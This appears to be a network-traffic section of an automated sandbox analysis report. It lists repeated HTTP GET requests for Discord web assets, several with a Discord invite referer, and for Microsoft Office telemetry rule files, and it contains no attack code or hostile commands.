                          Source: global trafficHTTP traffic detected: GET /assets/5067a2ec1b24a6de868c.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/assets/ac625b77a0bab0ee72df.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/a6f6204cd40c3c5f5c14.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/assets/ac625b77a0bab0ee72df.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/ac625b77a0bab0ee72df.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/0a52c6142094387fceed.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /api/v9/experiments?with_guild_experiments=true HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/09a6f112fcbc17f6cfd4.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/5067a2ec1b24a6de868c.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/8143f89919f42e84b455.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/1bab9b095996b8d024ce.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/assets/ac625b77a0bab0ee72df.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/ac8bc50434b97c69dbfa.css HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/2917679ca8a08c390036.css HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/55ad931ed92a15c15709.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/6e08830110af09d36881.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/d67c5e680608266a1f63.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/a6f6204cd40c3c5f5c14.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/1098b8da25f51e58cea4.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/09a6f112fcbc17f6cfd4.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/8e217faefc0006e5a018.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js? HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/771babda7e3dcee4f677.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/d4dcfe8e106a8072717f.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/ed216fb74081c12ffece.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/1bab9b095996b8d024ce.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/d67c5e680608266a1f63.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/b54790681a89c77f55ad.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/6e08830110af09d36881.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
